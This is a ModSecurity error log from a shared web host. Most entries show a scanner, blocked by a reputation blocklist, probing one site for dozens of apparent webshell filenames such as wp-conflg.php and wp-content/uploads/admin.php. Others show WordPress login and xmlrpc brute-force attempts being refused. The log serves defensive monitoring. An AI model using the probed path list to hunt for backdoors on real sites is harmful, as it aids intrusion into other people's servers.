[Tue May 26 16:35:30.254668 2026] [security2:error] [pid 808625:tid 808783] [client 130.131.224.225:63289] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/ok.php"] [unique_id "ahV-ejEl_SBaWibfDmpjZAAAABw"]
[Tue May 26 16:35:30.254805 2026] [security2:error] [pid 808625:tid 808783] [client 130.131.224.225:63289] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/ok.php"] [unique_id "ahV-ejEl_SBaWibfDmpjZAAAABw"]
[Tue May 26 16:35:30.529513 2026] [security2:error] [pid 808625:tid 808827] [client 130.131.224.225:64515] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/drykl.php"] [unique_id "ahV-ejEl_SBaWibfDmpjbAAAAEg"]
[Tue May 26 16:35:30.529664 2026] [security2:error] [pid 808625:tid 808827] [client 130.131.224.225:64515] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/drykl.php"] [unique_id "ahV-ejEl_SBaWibfDmpjbAAAAEg"]
[Tue May 26 16:35:30.657035 2026] [security2:error] [pid 808625:tid 808782] [client 130.131.224.225:63293] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/atomlib.php"] [unique_id "ahV-ejEl_SBaWibfDmpjbgAAABs"]
[Tue May 26 16:35:30.657143 2026] [security2:error] [pid 808625:tid 808782] [client 130.131.224.225:63293] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/atomlib.php"] [unique_id "ahV-ejEl_SBaWibfDmpjbgAAABs"]
[Tue May 26 16:35:30.793222 2026] [security2:error] [pid 808625:tid 808879] [client 130.131.224.225:63904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/z.php"] [unique_id "ahV-ejEl_SBaWibfDmpjcgAAAHw"]
[Tue May 26 16:35:30.793328 2026] [security2:error] [pid 808625:tid 808879] [client 130.131.224.225:63904] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/z.php"] [unique_id "ahV-ejEl_SBaWibfDmpjcgAAAHw"]
[Tue May 26 16:35:31.048904 2026] [security2:error] [pid 808625:tid 808825] [client 130.131.224.225:63950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-png.php"] [unique_id "ahV-ezEl_SBaWibfDmpjeQAAAEY"]
[Tue May 26 16:35:31.049032 2026] [security2:error] [pid 808625:tid 808825] [client 130.131.224.225:63950] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-png.php"] [unique_id "ahV-ezEl_SBaWibfDmpjeQAAAEY"]
[Tue May 26 16:35:31.226373 2026] [security2:error] [pid 808625:tid 808833] [client 130.131.224.225:63351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-content/uploads/admin.php"] [unique_id "ahV-ezEl_SBaWibfDmpjfwAAAE4"]
[Tue May 26 16:35:31.226494 2026] [security2:error] [pid 808625:tid 808833] [client 130.131.224.225:63351] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-content/uploads/admin.php"] [unique_id "ahV-ezEl_SBaWibfDmpjfwAAAE4"]
[Tue May 26 16:35:31.367751 2026] [security2:error] [pid 808625:tid 808834] [client 130.131.224.225:63284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-admin/maint/wp-is.php"] [unique_id "ahV-ezEl_SBaWibfDmpjggAAAE8"]
[Tue May 26 16:35:31.367857 2026] [security2:error] [pid 808625:tid 808834] [client 130.131.224.225:63284] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-admin/maint/wp-is.php"] [unique_id "ahV-ezEl_SBaWibfDmpjggAAAE8"]
[Tue May 26 16:35:31.547754 2026] [security2:error] [pid 808625:tid 808835] [client 130.131.224.225:64586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/sadcut1.php"] [unique_id "ahV-ezEl_SBaWibfDmpjhgAAAFA"]
[Tue May 26 16:35:31.547864 2026] [security2:error] [pid 808625:tid 808835] [client 130.131.224.225:64586] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/sadcut1.php"] [unique_id "ahV-ezEl_SBaWibfDmpjhgAAAFA"]
[Tue May 26 16:35:31.702851 2026] [security2:error] [pid 808625:tid 808882] [client 130.131.224.225:63353] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahV-ezEl_SBaWibfDmpjigAAAH8"]
[Tue May 26 16:35:31.702947 2026] [security2:error] [pid 808625:tid 808882] [client 130.131.224.225:63353] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahV-ezEl_SBaWibfDmpjigAAAH8"]
[Tue May 26 16:35:31.871804 2026] [security2:error] [pid 808625:tid 808821] [client 130.131.224.225:62685] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahV-ezEl_SBaWibfDmpjjwAAAEI"]
[Tue May 26 16:35:31.871892 2026] [security2:error] [pid 808625:tid 808821] [client 130.131.224.225:62685] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahV-ezEl_SBaWibfDmpjjwAAAEI"]
[Tue May 26 16:35:31.910571 2026] [security2:error] [pid 808625:tid 808809] [client 142.147.108.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-ezEl_SBaWibfDmpjjgAAADY"], referer: https://anujtradingco.com
[Tue May 26 16:35:32.034026 2026] [security2:error] [pid 808625:tid 808839] [client 130.131.224.225:63275] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-conflg.php"] [unique_id "ahV-fDEl_SBaWibfDmpjmAAAAFQ"]
[Tue May 26 16:35:32.034134 2026] [security2:error] [pid 808625:tid 808839] [client 130.131.224.225:63275] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-conflg.php"] [unique_id "ahV-fDEl_SBaWibfDmpjmAAAAFQ"]
[Tue May 26 16:35:32.299773 2026] [security2:error] [pid 808625:tid 808810] [client 130.131.224.225:65071] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-update.php"] [unique_id "ahV-fDEl_SBaWibfDmpjngAAADc"]
[Tue May 26 16:35:32.299865 2026] [security2:error] [pid 808625:tid 808810] [client 130.131.224.225:65071] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-update.php"] [unique_id "ahV-fDEl_SBaWibfDmpjngAAADc"]
[Tue May 26 16:35:32.481613 2026] [security2:error] [pid 808625:tid 808860] [client 130.131.224.225:65051] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/hello.php"] [unique_id "ahV-fDEl_SBaWibfDmpjogAAAGk"]
[Tue May 26 16:35:32.481723 2026] [security2:error] [pid 808625:tid 808860] [client 130.131.224.225:65051] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/hello.php"] [unique_id "ahV-fDEl_SBaWibfDmpjogAAAGk"]
[Tue May 26 16:35:32.717212 2026] [security2:error] [pid 808625:tid 808867] [client 130.131.224.225:63325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/NewFile.php"] [unique_id "ahV-fDEl_SBaWibfDmpjrQAAAHA"]
[Tue May 26 16:35:32.717324 2026] [security2:error] [pid 808625:tid 808867] [client 130.131.224.225:63325] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/NewFile.php"] [unique_id "ahV-fDEl_SBaWibfDmpjrQAAAHA"]
[Tue May 26 16:35:33.072561 2026] [security2:error] [pid 808625:tid 808844] [client 66.249.70.199:62966] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahV-fDEl_SBaWibfDmpjpAAAAFk"]
[Tue May 26 16:35:33.318835 2026] [security2:error] [pid 808625:tid 808870] [client 130.131.224.225:63344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/bless5.php"] [unique_id "ahV-fTEl_SBaWibfDmpjtgAAAHM"]
[Tue May 26 16:35:33.318946 2026] [security2:error] [pid 808625:tid 808870] [client 130.131.224.225:63344] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/bless5.php"] [unique_id "ahV-fTEl_SBaWibfDmpjtgAAAHM"]
[Tue May 26 16:35:33.536240 2026] [security2:error] [pid 808625:tid 808861] [client 130.131.224.225:64577] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/v2.php"] [unique_id "ahV-fTEl_SBaWibfDmpjvgAAAGo"]
[Tue May 26 16:35:33.536356 2026] [security2:error] [pid 808625:tid 808861] [client 130.131.224.225:64577] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/v2.php"] [unique_id "ahV-fTEl_SBaWibfDmpjvgAAAGo"]
[Tue May 26 16:35:33.712486 2026] [security2:error] [pid 808625:tid 808853] [client 130.131.224.225:62598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp4.php"] [unique_id "ahV-fTEl_SBaWibfDmpjwgAAAGI"]
[Tue May 26 16:35:33.712638 2026] [security2:error] [pid 808625:tid 808853] [client 130.131.224.225:62598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp4.php"] [unique_id "ahV-fTEl_SBaWibfDmpjwgAAAGI"]
[Tue May 26 16:35:33.942589 2026] [security2:error] [pid 808625:tid 808767] [client 130.131.224.225:63295] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/bless11.php"] [unique_id "ahV-fTEl_SBaWibfDmpjyQAAAAw"]
[Tue May 26 16:35:33.942742 2026] [security2:error] [pid 808625:tid 808767] [client 130.131.224.225:63295] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/bless11.php"] [unique_id "ahV-fTEl_SBaWibfDmpjyQAAAAw"]
[Tue May 26 16:35:34.157544 2026] [security2:error] [pid 808625:tid 808794] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-fTEl_SBaWibfDmpjvQAAACc"]
[Tue May 26 16:35:34.252122 2026] [security2:error] [pid 808625:tid 808840] [client 130.131.224.225:62704] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/fileas.php"] [unique_id "ahV-fjEl_SBaWibfDmpjzgAAAFU"]
[Tue May 26 16:35:34.252249 2026] [security2:error] [pid 808625:tid 808840] [client 130.131.224.225:62704] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/fileas.php"] [unique_id "ahV-fjEl_SBaWibfDmpjzgAAAFU"]
[Tue May 26 16:35:34.616137 2026] [security2:error] [pid 808625:tid 808859] [client 130.131.224.225:63250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-aothait.php"] [unique_id "ahV-fjEl_SBaWibfDmpj2AAAAGg"]
[Tue May 26 16:35:34.616251 2026] [security2:error] [pid 808625:tid 808859] [client 130.131.224.225:63250] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-aothait.php"] [unique_id "ahV-fjEl_SBaWibfDmpj2AAAAGg"]
[Tue May 26 16:35:34.852009 2026] [security2:error] [pid 808625:tid 808866] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-fjEl_SBaWibfDmpj0QAAAG8"]
[Tue May 26 16:35:34.894281 2026] [security2:error] [pid 808625:tid 808651] [remote 52.18.195.140:33294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahV-fjEl_SBaWibfDmpj4gAAWhk"]
[Tue May 26 16:35:34.907274 2026] [security2:error] [pid 808625:tid 808858] [client 130.131.224.225:63928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/motu.php"] [unique_id "ahV-fjEl_SBaWibfDmpj5gAAAGc"]
[Tue May 26 16:35:34.907370 2026] [security2:error] [pid 808625:tid 808858] [client 130.131.224.225:63928] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/motu.php"] [unique_id "ahV-fjEl_SBaWibfDmpj5gAAAGc"]
[Tue May 26 16:35:35.469504 2026] [security2:error] [pid 808625:tid 808841] [client 130.131.224.225:64625] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/fff.php"] [unique_id "ahV-fzEl_SBaWibfDmpj-gAAAFY"]
[Tue May 26 16:35:35.469603 2026] [security2:error] [pid 808625:tid 808841] [client 130.131.224.225:64625] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/fff.php"] [unique_id "ahV-fzEl_SBaWibfDmpj-gAAAFY"]
[Tue May 26 16:35:35.502515 2026] [security2:error] [pid 808625:tid 808633] [remote 74.7.241.58:44172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV-fzEl_SBaWibfDmpj_AAAZAc"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:35:35.541391 2026] [security2:error] [pid 808625:tid 808790] [client 185.231.155.169:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV-fzEl_SBaWibfDmpj-wAAACM"], referer: http://anujtradingco.com/homepages/shop-parallax/
[Tue May 26 16:35:35.775822 2026] [security2:error] [pid 808625:tid 808881] [client 130.131.224.225:65024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp5.php"] [unique_id "ahV-fzEl_SBaWibfDmpkAQAAAH4"]
[Tue May 26 16:35:35.775970 2026] [security2:error] [pid 808625:tid 808881] [client 130.131.224.225:65024] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp5.php"] [unique_id "ahV-fzEl_SBaWibfDmpkAQAAAH4"]
[Tue May 26 16:35:35.796909 2026] [security2:error] [pid 808625:tid 808805] [client 117.198.37.168:59192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-fzEl_SBaWibfDmpkAgAAADI"]
[Tue May 26 16:35:35.797033 2026] [security2:error] [pid 808625:tid 808805] [client 117.198.37.168:59192] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV-fzEl_SBaWibfDmpkAgAAADI"]
[Tue May 26 16:35:35.940289 2026] [security2:error] [pid 808625:tid 808833] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV-fjEl_SBaWibfDmpj6QAAAE4"]
[Tue May 26 16:35:36.053690 2026] [security2:error] [pid 808625:tid 808803] [client 130.131.224.225:64539] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-act.php"] [unique_id "ahV-gDEl_SBaWibfDmpkBwAAADA"]
[Tue May 26 16:35:36.053786 2026] [security2:error] [pid 808625:tid 808803] [client 130.131.224.225:64539] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/wp-act.php"] [unique_id "ahV-gDEl_SBaWibfDmpkBwAAADA"]
[Tue May 26 16:35:36.284874 2026] [security2:error] [pid 808625:tid 808843] [client 130.131.224.225:65074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/myfile.php"] [unique_id "ahV-gDEl_SBaWibfDmpkCAAAAFg"]
[Tue May 26 16:35:36.284974 2026] [security2:error] [pid 808625:tid 808843] [client 130.131.224.225:65074] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/myfile.php"] [unique_id "ahV-gDEl_SBaWibfDmpkCAAAAFg"]
[Tue May 26 16:35:36.487744 2026] [security2:error] [pid 808625:tid 808848] [client 130.131.224.225:63999] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/xqq.php"] [unique_id "ahV-gDEl_SBaWibfDmpkEgAAAF0"]
[Tue May 26 16:35:36.487856 2026] [security2:error] [pid 808625:tid 808848] [client 130.131.224.225:63999] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "btc-bingo.com.md-74.webhostbox.net"] [uri "/xqq.php"] [unique_id "ahV-gDEl_SBaWibfDmpkEgAAAF0"]
